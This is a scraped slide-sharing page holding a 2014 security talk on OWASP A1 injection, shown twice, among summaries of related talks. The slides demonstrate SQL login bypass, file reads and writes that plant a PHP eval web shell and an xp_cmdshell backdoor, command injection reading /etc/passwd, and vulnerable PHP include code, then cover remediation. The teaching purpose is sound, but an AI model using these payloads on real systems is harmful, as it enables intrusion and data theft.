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Owasp A1: Injection
31 March 2014: Dubai, UAE
About Me
• Who am I?
– Michael Hendrickx
– Information Security Consultant, currently
working for UAE Federal Government.
– Assessments, Security Audits, secure coding
• Owasp Top 10 – 2013
– A1: Injection
– A2: Broken Authentication and Session Mgmt
– A3: Cross Site Scripting
– A4: Insecure Direct Object References
– A5: Security Misconfiguration
– A6: Sensitive Data Exposure
– A7: Missing Function Level Access Control
– A8: Cross Site Request Forgery
– A9: Using Components with Known Vulns
– A10: Invalidated Redirects and Forwards
How bad is it?
• Oct ‘13: 100k $ stolen from a California ISP
• Jun ‘13: Hackers cleared Turkish people’s bills for water,
gas, telephone…
• Nov ‘12: 150k Adobe user accounts stolen
• Jul ‘12: 450k Yahoo! User accounts stolen

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Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)

The document summarizes the top 10 security vulnerabilities in web applications according to the Open Web Application Security Project (OWASP). These include injection flaws, cross-site scripting, broken authentication and session management, insecure direct object references, cross-site request forgery, security misconfiguration, insecure cryptographic storage, failure to restrict URL access, insufficient transport layer protection, and unvalidated redirects and forwards. Countermeasures for each vulnerability are also provided.

Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting

Cross Site Scripting (XSS) is a type of injection attack where malicious scripts are injected into otherwise benign and trusted websites. XSS has been a top web application vulnerability since 1996. There are three main types of XSS attacks: reflected XSS, stored XSS, and DOM-based XSS. Reflected XSS occurs when malicious scripts come from URLs, while stored XSS happens when scripts are stored on websites. XSS can be used to steal cookies and sessions, redirect users, alter website contents, and damage an organization's reputation. Developers can prevent XSS through input validation, output encoding, and using the HttpOnly flag.

Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection

This presentation will provide you the deep knowledge of the Cross-Site Scripting and SQL Injection with the remediation and prevention measures.

information securityeducationinformation technology
What is Injection?
• Web applications became more complex
– Database driven
– Extra functionality (email, ticket booking, ..)
• Submitting data has a special meaning to
underlying technologies
• Mixing commands and data.
• Types:
– SQL Injection
– XML Injection
– Command Injection
Injection analogy
• A case is filed against me
• I write my name as
“Michael, you are free to go”
• Judge announces case:
“Calling Michael, you are free to go.”
• Bailiff lets me go.
Mix of “data” and “commands”.
Injection Fails
Mix of “data” and “commands”.
IT underlying technology?
• A webserver parses and “pass on” data
Web Server
Script performs business logic and
parses messages to backend.
“Hey, get me a message from the
DB with id 8471350”

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Cross site scripting (xss) attacks issues and defense - by sandeep kumbhar

Introduction Impact of XSS attacks Types of XSS attacks Detection of XSS attacks Prevention of XSS attacks At client side At Server-side Conclusion References

internetnetwork securitysocial networking
Broken access control
Broken access controlBroken access control
Broken access control

Presentation on broken access control. Covered almost complete topic. This presentation includes what is broken access control?, Example of broken access control and how to prevent it.

Sql injection
Sql injectionSql injection
Sql injection

The document discusses SQL injection, including its types, methodology, attack queries, and prevention. SQL injection is a code injection technique where a hacker manipulates SQL commands to access a database and sensitive information. It can result in identity spoofing, modifying data, gaining administrative privileges, denial of service attacks, and more. The document outlines the steps of a SQL injection attack and types of queries used. Prevention methods include minimizing privileges, coding standards, and firewalls.

SQL Injection
• Dynamic script to look up data in DB
Web Server
name = ’michael’ AND
password = ‘secret123’
SELECT * FROM messages
WHERE id = 8471350
Get indirect access to the
SQL Injection
• Insert value with ’ (single quote)
– Single quote is delimiter for SQL queries
Web Server’ael&password=secret123
Query is incorrectly, will throw error (if not
name = ’mich’ael’ AND
password = ‘secret123’
SQL Injection
• Insert value with ’ (single quote)
– Single quote is delimiter for SQL queries
Web Server’ael&password=secret123
Query is incorrectly, will throw error (if not
name = ’mich’ael’ AND
password = ‘secret123’
SQL Injection
• Insert value with ’ (single quote)
Web Server’ OR ’a’ = ’a
name = ’michael’ AND
password = ’test ’ OR ‘a’ = ‘a’
‘a’ will always equal ‘a’, and thus log in this user.

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Sql injection
Sql injectionSql injection
Sql injection

The document discusses SQL injection attacks and how they work. SQL injection occurs when user input is inserted directly into an SQL query string without proper validation or escaping. This allows attackers to alter the structure of the intended SQL query and potentially gain unauthorized access to sensitive data or make unauthorized changes to the database. The document provides examples of vulnerable queries and how attackers can exploit them to inject malicious SQL code. It also lists some common techniques used in SQL injection attacks and provides recommendations for preventing SQL injection vulnerabilities.

Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques

General Waf detection and bypassing techniques. Main focus to demonstrate that how to take right approach to analyse the behaviour of web application firewall and then create test cases to bypass the same.

SSRF workshop
SSRF workshop SSRF workshop
SSRF workshop

This document discusses server-side request forgery (SSRF) exploitation. It provides examples of how SSRF can be used to access internal networks and bypass authentication by forging requests from the vulnerable server. Specific cases described include exploiting OAuth token hijacking, memcached exploitation using protocol smuggling, and exploiting vulnerabilities in libraries like TCPDF, LWP, and Postgres that enable SSRF. The document encourages finding creative ways to leverage SSRF and related vulnerabilities like open redirects, XML external entities, and SQL injection to compromise hosts and internal services.

securityweb applicationworkshop
SQL Injection
• More advanced possibilities:
– Read files*:
HEX(LOAD_FILE(‘/var/www/’)) INTO
DUMPFILE ‘/var/www/’;
CREATE TABLE newfile(data text);
BULK INSERT newfile FROM ‘C:secretfile.dat’ WITH
*: If you have the right privileges
SQL Injection
• Write files
– MySQL:
CREATE TABLE tmp(data longblog);
INSERT INTO tmp(data) VALUES(0x3c3f7068);
UPDATE tmp SET data=CONCAT(data, 0x20245f...);
<?php $_REQUEST[e] ? eval(base64_decode($_REQUEST[e])); exit;?>
CEXEC xp_cmdshell(‘echo ... >> backdoor.aspx’);
*: Again, If you have the right privileges
SQL Injection: SQLMap
• SQL Map will perform
attacks on target.
• Dumps entire tables
• Even entire databases.
• Stores everything in CSV
• More info on
HTML Injection
• Possible to include HTML tags into fields
• Used to render “special” html tags where
normal text is expected
• XSS possible,
rewrite the

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Cross Site Request Forgery (CSRF) Scripting Explained
Cross Site Request Forgery (CSRF) Scripting ExplainedCross Site Request Forgery (CSRF) Scripting Explained
Cross Site Request Forgery (CSRF) Scripting Explained

Key Points What is Cross Site Request Forgery (CSRF)? How Attack Can Happen? Damages caused by CSRF? Mitigations What is Cross Site Request Forgery (CSRF)? CSRF is an attack in which attacker forges the request as a trusted user. The request is essentially made to send unintended data to the site. A vulnerable web application assumes that the data is coming from a trusted user. The root cause is – request coming from browser is trusted by server blindly, if CSRF protection is not implemented. This “blind trust” lets attacker create a forged request, and make the victim perform that request. How Attack Can Happen? Attacker knows about target application, on which the attack is to be performed Attacker forges request and sends it to victim who may be logged into the website by embedding that forged request into a hyperlink Victim clicks on it, and unknowingly sends malicious request to website Website accepts it and processes it. Thus the attacker is successful in performing the attack. Damages caused by CSRF? In Net-banking attacker can forge the request and send it to victim to steal money from Victim’s account Personal health information can be stolen or modified in a hospital database Attacker force victim to perform unwanted action which affect their profile Mitigation Techniques Can be mitigate by two ways CSRF token (a cookie which is introduced in each form and validated by web app) Captcha (implemented to ensure that the request is being performed by a human interaction)

ethical hackingwebsite hackinginformation security
Bug bounty
Bug bountyBug bounty
Bug bounty

This document discusses bug bounty programs (BBPs), which reward security researchers for responsibly disclosing software vulnerabilities. It introduces BBPs, noting they save companies money while improving security. Major companies like Google and Facebook run BBPs. The document outlines prerequisites for BBPs like learning security testing techniques. It provides tips for finding vulnerabilities like understanding a site's scope, tools, and avoiding duplicate reports. Common vulnerability types in BBPs include injection flaws and insecure data storage.

Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF

The document discusses CRLF injection and SSRF vulnerabilities. CRLF injection occurs when user input is directly parsed into response headers without sanitization, allowing special characters to be injected. SSRF is when a server is induced to make HTTP requests to domains of an attacker's choosing, potentially escalating access. Mitigations include sanitizing user input, implementing whitelists for allowed domains/protocols, and input validation.

securityinformation securitysecurity news
HTML Injection
• Possible to insert iframes, fake forms, JS, …
• Can be used in phishing attack
Button goes to different
form, potentially stealing
XML Injection
• Web app talks to backend web services
• Web app’s logic converts parameters to XML
web services (as SOAP, …)
Web Server
Web service
Web service
XML Injection
<?xml version=“1.0” encoding=“ISO-8859-1” ?>
<date>25 Jan 2014, 13:10:01</date>
<?xml version=“1.0” encoding=“ISO-8859-1” ?>
<date>25 Jan 2014, 13:24:48</date>
Web app to create a new user
Command Injection
• Web application performs Operating System
– Execute external programs / scripts
– List files
– Send email
Web Server OS

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HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)

While input validation vulnerabilities such as XSS and SQL injection have been intensively studied, a new class of injection vulnerabilities called HTTP Parameter Pollution (HPP) has not received as much attention. HPP attacks consist of injecting encoded query string delimiters into other existing parameters. If a web application does not properly sanitize the user input, a malicious user can compromise the logic of the application to perform either client-side or server-side attacks. One consequence of HPP attacks is that the attacker can potentially override existing hard-coded HTTP parameters to modify the behavior of an application, bypass input validation checkpoints, and access and possibly exploit variables that may be out of direct reach. In the talk we present the first automated system for the detection of HPP vulnerabilities in real web applications. Our approach consists of injecting fuzzed parameters into the web application and a set of tests and heuristics to determine if the pages that are generated contain HPP vulnerabilities. We used this system to conduct a large-scale experiment by testing more than 5,000 popular websites and discovering unknown HPP flaws in many important and well-known sites such as Microsoft, Google, VMWare, Facebook, Symantec, Paypal and others. These sites have been all informed and many of them have acknowledged or fixed the problems. We will explain in details how to efficiently detect HPP bugs and how to prevent this novel class of injection vulnerabilities in future web applications.

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Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101

This document provides an introduction to bug bounty programs. It defines what a bug bounty program is, provides a brief history of major programs, and discusses reasons they are beneficial for both security researchers and companies. Key points covered include popular programs like Google and Facebook, tools used in bug hunting like Burp Suite, and lessons for researchers such as writing quality reports and following each program's rules.

bug bountyowaspvulnerability
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing

SQL injection is a type of attack where malicious SQL code is injected into an application's database query, potentially exposing or modifying private data. Attackers can bypass logins, access secret data, modify website contents, or shut down databases. SQL injection occurs when user input is not sanitized before being used in SQL queries. Attackers first find vulnerable websites, then check for errors to determine the number of columns. They use "union select" statements to discover which columns are responsive to queries, allowing them to extract data like user credentials or database contents. Developers should sanitize all user inputs to prevent SQL injection attacks.

sql injectioneducationtutorial
Command Injection
• Dynamic script to share article
Web Server
$ echo “check this out” | mail –s “share”
$ echo “check this out” | mail –s “share”; mail < /etc/passwd;<+/etc/passwd
LDAP Injection
• Lightweight Directory Access Protocol
• LDAP is used to access information directories
– Users
– User information
– Software
– Computers
Web Server
LDAP Injection
• Insert special characters, such as (, |, &, *, …
• * (asterisk) allows listing of all users
Remote File Injection
• Scripts include other files to extend
• Why? Clarity, Reuse functionality
– PHP:
• include(), require(), require_once(), …
– Aspx:
– JSP:
• <% @include file=“…” %>

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SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)

This document provides an introduction to SQL injection basics. It defines SQL injection as executing a SQL query or statement by injecting it into a user input field. The document outlines why SQL injection is studied, provides a sample database structure, and describes generic SQL queries and operators like UNION and ORDER BY. It also categorizes different types of SQL injection and attacks. The remainder of the document previews upcoming topics on blind SQL injection, data extraction techniques, and prevention.

Xss ppt
Xss pptXss ppt
Xss ppt

Cross-site scripting (XSS) is the most common web application vulnerability. There are three main types of XSS attacks: reflected XSS, stored XSS, and DOM-based XSS. Reflected XSS occurs when malicious scripts are included in hyperlinks and infect the victim's browser when the link is clicked. Stored XSS involves injecting malicious scripts into the application itself, which are then executed when users access stored information. DOM-based XSS modifies the DOM environment used by client-side scripts, causing them to run unexpectedly and potentially harmfully. All XSS attacks allow attackers to hijack user sessions, insert hostile content, and fully compromise users. Applications can prevent XSS by validating all input

cyber security
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First Security

Topics include: - Sample and Demo of Top Application Risks
— Cross Site Scripting, SQL Injection, Access Control - Who’s Monitoring Your Traffic?
— Encrypting in Transit Secure Data Storage & Protection
— Correct Password -Storage & Data Protection -Growing Threats Plaguing Applications

Remote File Injection
• Color chooser
• Color will load new file with color codes
(blue.php, red.php, …)
• Attacker can upload malicious PHP file to an
external server
Will fetch and load
Remote File Injection
• Theme chooser
• Can input external HTML files
– That can contain JavaScript, XSS, rewrite the DOM,
• Also verify cookie contents, …
<link href=“/themes/<? print $_COOKIE[„theme‟] ?>.css” rel=“stylesheet” type=“text/css” />
• Implement Web Application Firewall (WAF)
• Prevents most common attacks
– Not 100% foolproof
• Make sure it can decrypt SSL
Web Server DBWAF
• Validate user input, all input:
– Never trust user input, ever.
– Even stored input (for later use)
– Force formats (numbers, email addresses, dates…)
– HTTP form fields, HTTP referers, cookies, …
• Apply secure coding standards
– Use prepared SQL statements
– Vendor specific guidelines
– OWASP secure coding practices:

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The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications

The top 10 security issues in web applications are: 1. Injection flaws such as SQL, OS, and LDAP injection. 2. Cross-site scripting (XSS) vulnerabilities that allow attackers to execute scripts in a victim's browser. 3. Broken authentication and session management, such as not logging users out properly or exposing session IDs. 4. Insecure direct object references where users can directly access files without authorization checks. 5. Cross-site request forgery (CSRF) that tricks a user into performing actions they did not intend. 6. Security misconfiguration of web or application servers. 7. Insecure cryptographic storage of passwords or sensitive data. 8

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null Bangalore meet - Php Security
null Bangalore meet - Php Securitynull Bangalore meet - Php Security
null Bangalore meet - Php Security

This document summarizes common web application vulnerabilities like cross-site scripting (XSS), SQL injection, and file uploads. It provides examples of each vulnerability and recommendations for mitigation strategies. For XSS, it recommends sanitizing input and escaping output. For SQL injection, it suggests using parameterized queries, stored procedures, and escaping strings. For file uploads, it advises validating file types, randomizing filenames, and restricting directory permissions. The document aims to help secure PHP web applications from these common risks.

Website Hacking and Preventive Measures
Website Hacking and Preventive MeasuresWebsite Hacking and Preventive Measures
Website Hacking and Preventive Measures

Today is the age of computer and internet. More and more people are creating their own websites to market their products and earn more profit from it. Having our own website will definitely help us in getting more customers purchasing our products but at the same time we can also attract hackers to play around with our website. If we have not taken enough care to protect our website from hackers then our business can even come to an end because of these hackers. If we own a website, then we might know the importance of ensuring that our website is safe from viruses and hackers. After going online most of the website designers think that their work is over. They have delivered what they were paid for and now they will be available for the maintenance of the site only. But sometimes the main problem starts after publishing the website. What if the website they have built suddenly start showing different stuff from what was already present there? What if weird things start appearing on the pages of our website? And most horribly what if the password of our login panel has changed and we are not able to login into our website. This is called hacking, a website hacking. We have to figure out how this happened so we can prevent it from happening again. In this seminar we are going to discuss some of major website hacking techniques and we are also going to discuss how to prevent website from getting vulnerable to different attacks currently use by various hackers.

website hackingsql injectionlfi
• Adopt least-privilege policies
– Give DB users least privileges
– Use multiple DB users
– Run processes with restricted privileges
– Restrict permissions on directories
• Do your web directories really need to be writable?
• Run in sandboxed environment
• Suppress error messages
• Enable exception notifications
– If something strange happens, reset session and notify
• Don’t trust your user input.
• Don’t trust your user input.
• Adopt secure coding policies
• Implement defense in depth
• Do log analysis to detect anomalies
• And don’t trust your user input.
Thank you!
Michael Hendrickx

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Owasp Top 10 A1: Injection

  • 1. Owasp A1: Injection 31 March 2014: Dubai, UAE
  • 2. About Me • Who am I? – Michael Hendrickx – Information Security Consultant, currently working for UAE Federal Government. – Assessments, Security Audits, secure coding
  • 3. • Owasp Top 10 – 2013 – A1: Injection – A2: Broken Authentication and Session Mgmt – A3: Cross Site Scripting – A4: Insecure Direct Object References – A5: Security Misconfiguration – A6: Sensitive Data Exposure – A7: Missing Function Level Access Control – A8: Cross Site Request Forgery – A9: Using Components with Known Vulns – A10: Invalidated Redirects and Forwards
  • 4. How bad is it? • Oct ‘13: 100k $ stolen from a California ISP of.html • Jun ‘13: Hackers cleared Turkish people’s bills for water, gas, telephone… Administration-Site-Hackers-Claim-to-Have-Erased-Debts-364000.shtml • Nov ‘12: 150k Adobe user accounts stolen he-used-sql-injection/240134996 • Jul ‘12: 450k Yahoo! User accounts stolen account-safe/
  • 5. What is Injection? • Web applications became more complex – Database driven – Extra functionality (email, ticket booking, ..) • Submitting data has a special meaning to underlying technologies • Mixing commands and data. • Types: – SQL Injection – XML Injection – Command Injection Web DBOS Backend System
  • 6. Injection analogy • A case is filed against me • I write my name as “Michael, you are free to go” • Judge announces case: “Calling Michael, you are free to go.” • Bailiff lets me go. Mix of “data” and “commands”.
  • 7. Injection Fails Mix of “data” and “commands”.
  • 8. IT underlying technology? • A webserver parses and “pass on” data Web Server DB OS Script performs business logic and parses messages to backend. “Hey, get me a message from the DB with id 8471350”
  • 9. SQL Injection • Dynamic script to look up data in DB Web Server DB SELECT * FROM users WHERE name = ’michael’ AND password = ‘secret123’ SELECT * FROM messages WHERE id = 8471350 Get indirect access to the database
  • 10. SQL Injection • Insert value with ’ (single quote) – Single quote is delimiter for SQL queries Web Server’ael&password=secret123 DB Query is incorrectly, will throw error (if not suppressed). SELECT * FROM users WHERE name = ’mich’ael’ AND password = ‘secret123’
  • 11. SQL Injection • Insert value with ’ (single quote) – Single quote is delimiter for SQL queries Web Server’ael&password=secret123 DB Query is incorrectly, will throw error (if not suppressed). SELECT * FROM users WHERE name = ’mich’ael’ AND password = ‘secret123’
  • 12. SQL Injection • Insert value with ’ (single quote) Web Server’ OR ’a’ = ’a DB SELECT * FROM users WHERE name = ’michael’ AND password = ’test ’ OR ‘a’ = ‘a’ ‘a’ will always equal ‘a’, and thus log in this user.
  • 13. SQL Injection • More advanced possibilities: – Read files*: • MySQL: SELECT HEX(LOAD_FILE(‘/var/www/’)) INTO DUMPFILE ‘/var/www/’; • MS SQL: CREATE TABLE newfile(data text); ... BULK INSERT newfile FROM ‘C:secretfile.dat’ WITH (CODEPAGE=‘RAW’, FIELDTERMINATOR=‘|’,ROWTERMINATOR=‘---’); *: If you have the right privileges
  • 14. SQL Injection • Write files – MySQL: CREATE TABLE tmp(data longblog); INSERT INTO tmp(data) VALUES(0x3c3f7068); UPDATE tmp SET data=CONCAT(data, 0x20245f...); <?php $_REQUEST[e] ? eval(base64_decode($_REQUEST[e])); exit;?> ... SELECT data FROM tmp INTO DUMPFILE ‘/var/www/’; – MS SQL: CEXEC xp_cmdshell(‘echo ... >> backdoor.aspx’); *: Again, If you have the right privileges
  • 15. SQL Injection: SQLMap • SQL Map will perform attacks on target. • Dumps entire tables • Even entire databases. • Stores everything in CSV • More info on
  • 16. HTML Injection • Possible to include HTML tags into fields • Used to render “special” html tags where normal text is expected • XSS possible, rewrite the DOM
  • 17. HTML Injection • Possible to insert iframes, fake forms, JS, … • Can be used in phishing attack Button goes to different form, potentially stealing credentials.
  • 18. XML Injection • Web app talks to backend web services • Web app’s logic converts parameters to XML web services (as SOAP, …) Web Server Web service Web service DB Backend
  • 19. XML Injection <?xml version=“1.0” encoding=“ISO-8859-1” ?> <user> <status>new</status> <admin>false</admin> <date>25 Jan 2014, 13:10:01</date> <name>$name</name> <email>$email</email> </user></email><admin>true</a dmin><email> <?xml version=“1.0” encoding=“ISO-8859-1” ?> <user> <status>new</status> <admin>false</admin> <date>25 Jan 2014, 13:24:48</date> <name>michael</name> <email>a@b.c</email><admin>true</admin><email></email> </user> Web app to create a new user
  • 20. Command Injection • Web application performs Operating System tasks – Execute external programs / scripts – List files – Send email Web Server OS
  • 21. Command Injection • Dynamic script to share article Web Server DB OS $ echo “check this out” | mail –s “share” $ echo “check this out” | mail –s “share”; mail < /etc/passwd;<+/etc/passwd
  • 22. LDAP Injection • Lightweight Directory Access Protocol • LDAP is used to access information directories – Users – User information – Software – Computers Web Server LDAP Server
  • 23. LDAP Injection • Insert special characters, such as (, |, &, *, … • * (asterisk) allows listing of all users
  • 24. Remote File Injection • Scripts include other files to extend functionality • Why? Clarity, Reuse functionality – PHP: • include(), require(), require_once(), … – Aspx: • <!-- #include “…” --> – JSP: • <% @include file=“…” %>
  • 25. Remote File Injection • Color chooser • Color will load new file with color codes (blue.php, red.php, …) • Attacker can upload malicious PHP file to an external server <?php if(isset($_GET[„color‟])){ include($_GET[„color‟].„.php‟); } ?> Will fetch and load
  • 26. Remote File Injection • Theme chooser • Can input external HTML files – That can contain JavaScript, XSS, rewrite the DOM, etc... • Also verify cookie contents, … <link href=“/themes/<? print $_COOKIE[„theme‟] ?>.css” rel=“stylesheet” type=“text/css” />
  • 27. Remediation • Implement Web Application Firewall (WAF) • Prevents most common attacks – Not 100% foolproof • Make sure it can decrypt SSL Web Server DBWAF
  • 28. Remediation • Validate user input, all input: – Never trust user input, ever. – Even stored input (for later use) – Force formats (numbers, email addresses, dates…) – HTTP form fields, HTTP referers, cookies, … • Apply secure coding standards – Use prepared SQL statements – Vendor specific guidelines – OWASP secure coding practices:
  • 29. Remediation • Adopt least-privilege policies – Give DB users least privileges – Use multiple DB users – Run processes with restricted privileges – Restrict permissions on directories • Do your web directories really need to be writable? • Run in sandboxed environment • Suppress error messages • Enable exception notifications – If something strange happens, reset session and notify administrator.
  • 30. Summary • Don’t trust your user input. • Don’t trust your user input. • Adopt secure coding policies • Implement defense in depth • Do log analysis to detect anomalies • And don’t trust your user input.